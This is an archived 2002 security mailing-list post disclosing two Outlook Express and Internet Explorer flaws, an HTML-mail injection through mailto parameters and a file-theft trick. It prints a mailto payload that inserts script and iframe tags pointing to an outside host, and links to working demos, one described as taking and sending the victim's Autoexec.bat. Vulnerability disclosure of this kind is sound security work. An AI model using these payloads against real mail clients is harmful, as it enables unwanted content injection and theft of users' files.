More fun with html mail: Outlook Express, Internet Explorer, Other etc

From: http-equivat_private
Date: Sun Apr 14 2002 - 14:59:13 PDT

    Sunday, April 14, 2002

    1. Not Possible

    Technically it cannot be possible to create an html mail message from
    a mailto url scheme without user input. However shoe-horning html in
    through insertion of script tags does make it possible. Default
    installation of Outlook Express and probably Outlook, is 'mail
    sending format: html':

    ?cc=contestat_private
    &subject=Million Dollar Contest
    &body=<script></script>
    <iframe src=http://www.malware.com'>">
     contestat_private </a>

    This is not a good idea.

    Working Example:

    http://www.malware.com/$illine$$.html

    Note: this is an 8th month
    old 'thing':http://www.securityfocus.com/bid/3334

    2. EVEN WORSE:

    Trivial file theft using Outlook Express, maybe Outlook. Instead of
    delivering files to the target computer, we rather take files from
    the target computer. With a bit of Idiot Engineering, we reverse the
    process as detailed here: http://www.securityfocus.com/bid/1221 and
    here: http://www.kb.cert.org/vuls/id/31994.

    Note: now almost 24 months old.

    Working Example:

    This will pluck and send your Autoexec.bat from a default Windows
    installation. Targeted computers with specific files can prove more
    lucrative.

    http://www.malware.com/idiot$.html

    Notes:

    1. Outlook Express 6 default mail is in the 'restricted zone'.
    Outlook Express 5.5 isn't. Disable Active X and all those other
    things.

    2. Do not send 'unknown' webmasters entire web pages despite how
    tempting the request is.

    3. Scraping the bottom of the barrel.

    End Call.

    --